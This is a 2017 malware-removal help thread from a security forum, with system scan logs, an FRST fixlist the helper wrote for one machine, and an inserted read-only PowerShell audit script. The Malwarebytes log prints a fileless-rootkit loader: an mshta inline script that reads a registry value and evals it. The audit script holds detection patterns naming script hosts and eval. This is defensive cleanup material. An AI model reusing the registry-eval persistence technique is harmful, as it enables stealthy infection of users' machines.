Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

==================== Event log errors: =========================

Application errors:
==================
Error: (04/08/2017 10:41:24 AM) (Source: SideBySide) (EventID: 63) (User: )
Description: Activation context generation failed for "c:\program files (x86)\common files\adobe air\versions\1.0\Adobe AIR.dll".Error in manifest or policy file "c:\program files (x86)\common files\adobe air\versions\1.0\Adobe AIR.dll" on line 3.
The value "MAJOR_VERSION.MINOR_VERSION.BUILD_NUMBER_MAJOR.BUILD_NUMBER_MINOR" of attribute "version" in element "assemblyIdentity" is invalid.

Error: (04/08/2017 10:33:49 AM) (Source: SideBySide) (EventID: 80) (User: )
Description: Activation context generation failed for "c:\program files (x86)\eset\eset online scanner\ESETSmartInstaller.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d.manifest.

Error: (04/08/2017 09:03:16 AM) (Source: SideBySide) (EventID: 35) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest".Error in manifest or policy file "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" on line 1.
Component identity found in manifest does not match the identity of the component requested.
Reference is UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
Definition is UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Please use sxstrace.exe for detailed diagnosis.

Error: (04/08/2017 08:43:01 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (04/05/2017 05:00:03 AM) (Source: SideBySide) (EventID: 63) (User: )
Description: Activation context generation failed for "c:\program files (x86)\common files\adobe air\versions\1.0\Adobe AIR.dll".Error in manifest or policy file "c:\program files (x86)\common files\adobe air\versions\1.0\Adobe AIR.dll" on line 3.
The value "MAJOR_VERSION.MINOR_VERSION.BUILD_NUMBER_MAJOR.BUILD_NUMBER_MINOR" of attribute "version" in element "assemblyIdentity" is invalid.

Error: (04/05/2017 04:58:26 AM) (Source: SideBySide) (EventID: 80) (User: )
Description: Activation context generation failed for "c:\program files (x86)\eset\eset online scanner\ESETSmartInstaller.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d.manifest.

Error: (04/05/2017 04:56:43 AM) (Source: SideBySide) (EventID: 35) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest".Error in manifest or policy file "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" on line 1.
Component identity found in manifest does not match the identity of the component requested.
Reference is UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
Definition is UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Please use sxstrace.exe for detailed diagnosis.

Error: (04/04/2017 06:27:38 PM) (Source: SideBySide) (EventID: 63) (User: )
Description: Activation context generation failed for "c:\program files (x86)\common files\adobe air\versions\1.0\Adobe AIR.dll".Error in manifest or policy file "c:\program files (x86)\common files\adobe air\versions\1.0\Adobe AIR.dll" on line 3.
The value "MAJOR_VERSION.MINOR_VERSION.BUILD_NUMBER_MAJOR.BUILD_NUMBER_MINOR" of attribute "version" in element "assemblyIdentity" is invalid.

Error: (04/04/2017 06:25:44 PM) (Source: SideBySide) (EventID: 80) (User: )
Description: Activation context generation failed for "c:\program files (x86)\eset\eset online scanner\ESETSmartInstaller.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d.manifest.

Error: (04/04/2017 06:20:08 PM) (Source: SideBySide) (EventID: 35) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest".Error in manifest or policy file "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" on line 1.
Component identity found in manifest does not match the identity of the component requested.
Reference is UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
Definition is UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Please use sxstrace.exe for detailed diagnosis.

System errors:
=============
Error: (04/08/2017 12:45:46 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: The server {F9717507-6651-4EDB-BFF7-AE615179BCCF} did not register with DCOM within the required timeout.

Error: (04/08/2017 10:30:16 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 70. The internal error state is 105.

Error: (04/08/2017 10:30:16 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 70. The internal error state is 105.

Error: (04/08/2017 10:28:06 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 70. The internal error state is 105.

Error: (04/08/2017 10:28:06 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 70. The internal error state is 105.

Error: (04/08/2017 10:26:01 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 70. The internal error state is 105.

Error: (04/08/2017 10:26:01 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 70. The internal error state is 105.

Error: (04/08/2017 10:23:57 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 70. The internal error state is 105.

Error: (04/08/2017 10:23:57 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 70. The internal error state is 105.

Error: (04/08/2017 10:21:53 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 70. The internal error state is 105.


Edited by krtate, 08 April 2017 - 03:36 PM.


#4 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 08 April 2017 - 03:38 PM

CodeIntegrity:
===================================
  Date: 2012-08-15 20:12:34.270
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2012-08-15 20:12:34.192
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2011-02-27 19:01:15.791
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Users\KEKLR\AppData\Local\Temp\OnlineScanner\Anti-Virus\fsgk.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2011-02-27 19:01:15.775
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Users\KEKLR\AppData\Local\Temp\OnlineScanner\Anti-Virus\fsgk.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Memory info ===========================

Processor: Intel® Core™2 Duo CPU T6600 @ 2.20GHz
Percentage of memory in use: 73%
Total physical RAM: 3999.19 MB
Available physical RAM: 1043.05 MB
Total Virtual: 7996.56 MB
Available Virtual: 4584.46 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:285.17 GB) (Free:191.61 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (RECOVERY) (Fixed) (Total:12.72 GB) (Free:2.12 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive g: () (Removable) (Total:3.72 GB) (Free:3.46 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 298.1 GB) (Disk ID: 2169E425)
Partition 1: (Active) - (Size=199 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=285.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=12.7 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (Size: 3.7 GB) (Disk ID: 00000000)

Partition: GPT.

==================== End of Addition.txt ============================

I tried to run F-Secure, wouldn't work.

I tried Bit-Defender, but would have to uninstall my current anti-virus - didn't do this one

I have yet to try ESET, 

I ran House Call earlier, didn't find anything and didn't save log. Running again for a log. 

Ran Microsoft security and found nothing.

MBAM LOG

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 4/8/2017
Scan Time: 12:53 PM
Logfile: malwarebytes scan 4.8.2017 rootkit.txt
Administrator: Yes

Version: 2.2.1.1043
Malware Database: v2017.04.08.03
Rootkit Database: v2017.04.02.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: KEKLR

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 342188
Time Elapsed: 48 min, 45 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Warn
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 1
Rootkit.Fileless.MTGen, HKU\S-1-5-21-3698744866-2675293530-421701469-1001_Classes\09500508\SHELL\OPEN\COMMAND, Quarantined, [168d47a7c8e0b77f5b68314132cfde22],

Registry Values: 1
Rootkit.Fileless.MTGen, HKU\S-1-5-21-3698744866-2675293530-421701469-1001_Classes\09500508\SHELL\OPEN\COMMAND, mshta "about:<script>nFU1AT="NofG";s89d=new ActiveXObject("WScript.Shell");Rux3RNO="R";ugj14T=s89d.RegRead("HKCU\\software\\qyhgeurf\\hfuzav");ph4q5e="X7";eval(ugj14T);L4tdD="gvB";</script>", Quarantined, [168d47a7c8e0b77f5b68314132cfde22]

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)


Edited by Rocket Grannie, 08 April 2017 - 05:58 PM.

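The two findings in the logs above (the Classes\...\shell\open\command value that launches mshta with an inline script, and the Startup .lnk pointing at a hex-named folder under AppData\Local) are both persistence spots you can audit yourself. The script below is an added example written for this thread; it is not from Malwarebytes, FRST or the helper, and it only reports, it does not delete anything. It assumes Windows PowerShell (5.1 or later preferred) run in the affected user's session, so that HKCU:\Software\Classes is that user's HKU\<SID>_Classes hive and the Startup folder is that user's. The regex heuristics and the function names are my own choices, not something the tools in the thread use.

```powershell
# Added example, not from the thread or from any tool it mentions: a read-only audit of
# the two persistence spots the MBAM and FRST logs flagged. Nothing is removed; the
# output is a list of objects to review. Assumes Windows PowerShell in the affected
# user's session (HKCU: maps to HKU\<SID>_Classes for the logged-on user).

# 1) Classes\<key>\shell\open\command values that launch a script host inline.
#    The MBAM detection lived at HKU\<SID>_Classes\09500508\SHELL\OPEN\COMMAND and ran
#    mshta with an about:<script> payload that RegRead() a second registry value and
#    eval()'d it, so the actual code never touched disk.
function Find-SuspiciousShellOpenCommand {
    [CmdletBinding()]
    param(
        # Registry root to walk; per-user view of HKU\<SID>_Classes.
        [string]$ClassesRoot = 'HKCU:\Software\Classes',
        # Script-host launchers and payload markers worth a second look (my heuristic).
        [string]$Pattern = 'mshta|wscript|cscript|powershell|about:<script|eval\(|RegRead'
    )
    Get-ChildItem -Path $ClassesRoot -ErrorAction SilentlyContinue | ForEach-Object {
        $cmdKey = Join-Path $_.PSPath 'shell\open\command'
        if (-not (Test-Path -LiteralPath $cmdKey)) { return }
        $cmd = (Get-ItemProperty -LiteralPath $cmdKey -ErrorAction SilentlyContinue).'(default)'
        if (-not $cmd) { return }
        # Real ProgIds look like "Word.Document.12"; a bare 8-hex-digit key name is itself odd.
        $oddName = $_.PSChildName -match '^[0-9a-f]{8}$'
        if ($cmd -match $Pattern -or $oddName) {
            [pscustomobject]@{
                Location = $cmdKey
                Command  = $cmd
                Reason   = $(if ($cmd -match $Pattern) { 'script host / eval in command' }
                             else { 'unusual key name' })
            }
        }
    }
}

# 2) Per-user Startup folder shortcuts whose target is an oddly named file under
#    %LOCALAPPDATA%. FRST listed
#    b2f065a6.lnk -> C:\Users\KEKLR\AppData\Local\b3751cf7\cde8b52d.bf14bf089
function Find-SuspiciousStartupShortcut {
    [CmdletBinding()]
    param(
        [string]$StartupFolder = [Environment]::GetFolderPath('Startup')
    )
    $wsh = New-Object -ComObject WScript.Shell   # resolves .lnk targets without launching them
    Get-ChildItem -Path $StartupFolder -Filter '*.lnk' -ErrorAction SilentlyContinue | ForEach-Object {
        $target = $wsh.CreateShortcut($_.FullName).TargetPath
        $underLocalAppData = $target -match '\\AppData\\Local\\'
        $hexFolder         = $target -match '\\[0-9a-f]{8,}\\'
        $noExeExtension    = $target -notmatch '\.(exe|bat|cmd)$'
        if ($underLocalAppData -and ($hexFolder -or $noExeExtension)) {
            [pscustomobject]@{ Shortcut = $_.FullName; Target = $target }
        }
    }
}

# Run both checks; no output means nothing matched these heuristics, not that the machine is clean.
Find-SuspiciousShellOpenCommand | Format-List
Find-SuspiciousStartupShortcut  | Format-List
```

Treat hits as things to show the helper, not as a removal list: a quarantine that leaves the Startup shortcut and the registry value that feeds eval() in place is exactly why the detection came back after the first Malwarebytes scan, and the FRST fixlist in the next post is what removes those pieces together.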

#5 Android 8888

Android 8888

    SWI Malware Tracker

  • Helper
  • PipPipPipPipPip
  • 865 posts

Posted 08 April 2017 - 08:09 PM

Hello krtate and welcome to SpywareInfo Forum.
I'm Android 8888 and I'll be helping you. Please ask questions if anything is unclear.


Please right-click on Start > Control Panel > Programs and Features and remove the following program (in bold):
Coupon Printer for Windows


NOTICE: This script was written specifically for this user, for use on this particular machine. Running this on another machine may cause damage to your operating system.

Press the Windows key + R on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and click the OK button.
Please copy the entire contents of the code box below. To do this highlight the contents of the box and right click on it and select Copy.
Paste this into the open Notepad.
 

Start
CreateRestorePoint:
CloseProcesses:
EmptyTemp:
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Policies\Explorer: [NoSaveSettings] 00000000
HKU\S-1-5-18\...\Policies\system: [WallpaperStyle] 2**
Startup: C:\Users\KEKLR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b2f065a6.lnk [2017-04-08]
ShortcutTarget: b2f065a6.lnk -> C:\Users\KEKLR\AppData\Local\b3751cf7\cde8b52d.bf14bf089 ()
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.yahoo.com/food
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {0809851D-6B6B-49C8-93A3-D43B32E2A276} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKLM -> {22348997-7FD7-4759-AB9D-EB2B7A365617} URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {0809851D-6B6B-49C8-93A3-D43B32E2A276} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKLM-x32 -> {22348997-7FD7-4759-AB9D-EB2B7A365617} URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-3698744866-2675293530-421701469-1001 -> {0809851D-6B6B-49C8-93A3-D43B32E2A276} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKU\S-1-5-21-3698744866-2675293530-421701469-1001 -> {171DEBEB-C3D4-40b7-AC73-056A5EBA4A7E} URL =
SearchScopes: HKU\S-1-5-21-3698744866-2675293530-421701469-1001 -> {18A0C804-F9DD-48B2-8E0A-5E0AFF2A73B0} URL = hxxp://search.avg.com/route/?d=4b3d2cf0&i=23&tp=chrome&q={searchTerms}&lng={language}&ychte=us&nt=1
Toolbar: HKLM-x32 - No Name - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - No File
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw.dll [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npCouponPrinter.dll [2009-11-19] (Coupons, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMozCouponPrinter.dll [2009-11-19] (Coupons, Inc.)
CHR Extension: (Chrome Web Store Payments) - C:\Users\KEKLR\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-07-07]
CHR Extension: (Chrome Media Router) - C:\Users\KEKLR\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-11-22]
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
U4 eabfiltr; no ImagePath
S3 RtsUIR; system32\DRIVERS\Rts516xIR.sys [X]
S3 USBCCID; system32\DRIVERS\RtsUCcid.sys [X]
2017-04-08 13:45 - 2017-03-07 07:44 - 00000000 ____D C:\Users\KEKLR\AppData\Local\b3751cf7
2017-03-24 10:43 - 2017-03-08 07:27 - 00000000 ____D C:\Users\KEKLR\AppData\Local\fc867bd779
2016-07-27 23:59 - 2016-07-27 23:59 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\{2836CA7E-F1C6-4205-9D7E-086B5750A033}
2011-06-16 22:33 - 2011-06-16 22:33 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\{7A9359AC-4F7B-4132-B15D-EABA459EF74D}
2009-08-25 05:06 - 2009-08-25 05:06 - 0000032 _____ () C:\ProgramData\{051B9612-4D82-42AC-8C63-CD2DCEDC1CB3}.log
2009-08-09 04:42 - 2009-08-09 04:43 - 0000109 _____ () C:\ProgramData\{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}.log
2009-08-25 05:05 - 2009-08-25 05:05 - 0000032 _____ () C:\ProgramData\{23F3DA62-2D9E-4A69-B8D5-BE8E9E148092}.log
2009-08-09 04:36 - 2009-08-09 04:38 - 0000105 _____ () C:\ProgramData\{40BF1E83-20EB-11D8-97C5-0009C5020658}.log
2009-08-25 05:05 - 2009-08-25 05:05 - 0000032 _____ () C:\ProgramData\{4FC670EB-5F02-4B07-90DB-022B86BFEFD0}.log
2009-08-25 05:06 - 2009-08-25 05:06 - 0000032 _____ () C:\ProgramData\{9867824A-C86D-4A83-8F3C-E7A86BE0AFD3}.log
2009-08-09 04:35 - 2009-08-09 04:35 - 0000107 _____ () C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log
2009-08-09 04:38 - 2009-08-09 04:42 - 0000110 _____ () C:\ProgramData\{CB099890-1D5F-11D5-9EA9-0050BAE317E1}.log
2009-08-25 05:06 - 2009-08-25 05:06 - 0000105 _____ () C:\ProgramData\{d36dd326-7280-11d8-97c8-000129760cbe}.log
ZeroAccess:
C:\Users\KEKLR\AppData\Local\{62c84f77-987b-450c-f5fd-00ddcaad417b}
2016-11-24 18:47 - 2016-11-24 18:47 - 0066048 _____ () C:\Users\KEKLR\AppData\Local\Temp\Execute2App.exe
2016-11-24 18:47 - 2014-05-07 17:43 - 0568832 _____ (Microsoft Corporation) C:\Users\KEKLR\AppData\Local\Temp\msvcp90.dll
2016-11-24 18:47 - 2014-05-07 17:43 - 0655872 _____ (Microsoft Corporation) C:\Users\KEKLR\AppData\Local\Temp\msvcr90.dll
2016-11-23 11:51 - 2016-11-23 11:51 - 0490348 _____ () C:\Users\KEKLR\AppData\Local\Temp\sbwcrv.exe
2006-05-24 11:10 - 2006-05-24 11:10 - 0455600 ____R (Macrovision Corporation) C:\Users\KEKLR\AppData\Local\Temp\_is4F67.exe
C:\Windows\System32\igdumd32.dll
C:\Windows\System32\igdumdx32.dll
C:\Windows\System32\MFC71.DLL
C:\Windows\System32\MFC71U.DLL
C:\Windows\System32\MSVBVM60.DLL
C:\Windows\System32\MSVCP71.dll
C:\Windows\System32\MSVCR71.dll
C:\Windows\System32\olepro32.DLL
Task: {510B196C-5350-4298-B4D2-AF749C488825} - System32\Tasks\{6820B139-0AD1-4144-A3FD-E70E8C28103B} => pcalua.exe -a "C:\Users\KEKLR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R89YO0IS\AdobeAIRInstaller[1].exe" -d C:\Users\KEKLR\Desktop
C:\Users\KEKLR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R89YO0IS\AdobeAIRInstaller[1].exe
2013-08-10 20:58 - 2013-08-10 20:58 - 00000000 _____ () C:\Windows\system32\igdumdx32.dll
2013-08-10 20:58 - 2013-08-10 20:58 - 00000000 _____ () C:\Windows\system32\igdumd32.dll
2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MSVCP71.dll
2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MSVCR71.dll
2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MFC71.DLL
2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MFC71U.DLL
FirewallRules: [TCP Query User{59976019-56BF-4C07-8662-F6FA2CDDA46F}C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe] => (Allow) C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe
FirewallRules: [UDP Query User{563B2413-04C2-4711-817E-88F15DC9C6B4}C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe] => (Allow) C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe
C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe
C:\users\keklr\appdata\local\temp\7zs14ca
End

Save the file as fixlist.txt in to the same folder as FRST64.
Right-click the FRST64 icon and select Run as administrator to run the tool.
Click the Fix button only once and wait.
When finished FRST will generate a log on the Desktop (fixlog.txt). Please post it to your reply.

NOTE. It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work.

If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.


I can see that Malwarebytes did not remove the threats it found.
 

  • Open Malwarebytes;
  • On the left pane select Settings;
  • Select the Protection tab;
  • Scroll down to Scan Options and ensure Scan for Rootkits is on and leave all other settings to default.
  • Go back to DashBoard and select the blue Scan Now tab; Note: The scan may take some time to finish, so please be patient.
  • When the scan completes, if potential threats are detected, ensure to checkmark all the listed items, and click the Quarantine Selected button.
  • While still on the Scan tab, click the View Report button, and in the window that opens click the Export button, select Text file (*.txt), give it a name and save it to your Desktop.
  • The log can also be viewed by clicking the log to select it, then clicking the View Report button.
  • Please copy and paste the log in your next reply.

 

 

Please download RogueKiller 32/64 Bits Installer (setup.exe) by Tigzy and save it to your Desktop.

  • Right click on the file setup.exe and select Run as administrator to install the tool.
  • Click Yes to accept any security warnings that may appear.
  • Choose the installation language and click OK.
  • Checkmark "Install 32 and 64 bits versions" and click Next. Follow the steps to install the tool.
  • Now close all programs and browsers.
  • Please disconnect any USB or external drives from the computer before you run this scan!
  • Right-click on the RogueKiller icon and select Run as administrator.
  • Click Yes to accept any security warnings that may appear.
  • Click the Scan tab and then click the Start Scan button.
  • Wait until the scan has finished. This may take some time.
  • Once finished click on Open Report. It will open a new window.
  • Click Export TXT to export the report as a text file, give a name to the file such as Rklog.txt and save it to your Desktop.
  • Close RogueKiller.

Please copy and paste the contents of Rklog.txt to your next reply.

In your next reply please post:
The fixlog.txt produced by FRST;
The Malwarebytes log;

The Rklog.txt log.

Let me see those logs and tell me how the computer is running at this point.

Thank you.

Android 8888

 


Android 8888
 

Website: http://android8888.comlu.com

 

Tavira - Here's where I live!

 

Please read the Instructions for posting requested logs and the article "So how did I get infected in the first place?"
 
Our help is free, but if you wish to help keep these forums running please consider a donation; Please see This Topic for details.


#6 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 09 April 2017 - 07:15 AM

Thank you, I left clicked on "Start", Control Panel, Uninstall Program and removed the coupon printer program. The right click option doesn't work.

 

I will continue with your instructions later today.

 

I couldn't find a folder FRST64 on my desktop. Should I go through the instructions again and save to desktop and run again?

 

Scan from ESET, which took 14 hours to run:

C:\Program Files (x86)\Mozilla Firefox\plugins\npCouponPrinter.dll a variant of Win32/Adware.Coupons.AA application 
C:\Program Files (x86)\Mozilla Firefox\plugins\npMozCouponPrinter.dll a variant of Win32/Adware.Coupons.AA application 
C:\Windows\CouponPrinter.ocx a variant of Win32/Adware.Coupons.AA application 
 


Edited by krtate, 09 April 2017 - 08:20 AM.


#7 Android 8888

Android 8888

    SWI Malware Tracker

  • Helper
  • PipPipPipPipPip
  • 865 posts

Posted 09 April 2017 - 02:41 PM

Hello krtate.
 

Thank you, I left clicked on "Start", Control Panel, Uninstall Program and removed the coupon printer program. The right click option doesn't work.

I apologize, it was my mistake. You did well!

 

couldn't find a folder FRST64 on my desktop. Should I go through the instructions again and save to desktop and run again?

 

Okay, please proceed with the following instructions in the order listed and ask questions if anything is unclear.
 

 

Move the FRST64 executable file saved in the Downloads folder (C:\Users\KEKLR\Downloads) to the computer's Desktop.

Then press the Windows key + R on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and click the OK button.
Please copy the entire contents of the code box below. To do this highlight the contents of the box and right click on it and select Copy.
Paste this into the open Notepad.

 

Start
CreateRestorePoint:
CloseProcesses:
EmptyTemp:
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Policies\Explorer: [NoSaveSettings] 00000000
HKU\S-1-5-18\...\Policies\system: [WallpaperStyle] 2**
Startup: C:\Users\KEKLR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b2f065a6.lnk [2017-04-08]
ShortcutTarget: b2f065a6.lnk -> C:\Users\KEKLR\AppData\Local\b3751cf7\cde8b52d.bf14bf089 ()
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.yahoo.com/food
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {0809851D-6B6B-49C8-93A3-D43B32E2A276} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKLM -> {22348997-7FD7-4759-AB9D-EB2B7A365617} URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {0809851D-6B6B-49C8-93A3-D43B32E2A276} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKLM-x32 -> {22348997-7FD7-4759-AB9D-EB2B7A365617} URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-3698744866-2675293530-421701469-1001 -> {0809851D-6B6B-49C8-93A3-D43B32E2A276} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
